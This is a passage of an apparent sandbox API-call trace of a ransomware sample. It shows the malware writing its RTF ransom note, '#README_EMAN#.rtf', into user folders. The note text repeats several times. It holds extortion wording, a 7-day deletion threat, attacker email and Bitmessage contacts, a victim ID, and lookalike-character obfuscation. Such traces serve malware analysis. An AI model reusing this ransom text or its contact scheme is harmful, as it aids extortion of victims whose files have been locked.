ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.131] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¡ñ¶zÎj¬¸úo²BR|\x9a\x9a^é°\x8fI\x8f(\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0300.131] WriteFile (in: hFile=0x2d4, lpBuffer=0x1ef8ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.131] CloseHandle (hObject=0x2d4) returned 1 [0300.132] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ti\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ti\\#readme_eman#.rtf")) returned 0xffffffff [0300.132] GetLastError () returned 0x2 [0300.132] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ti\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ti\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 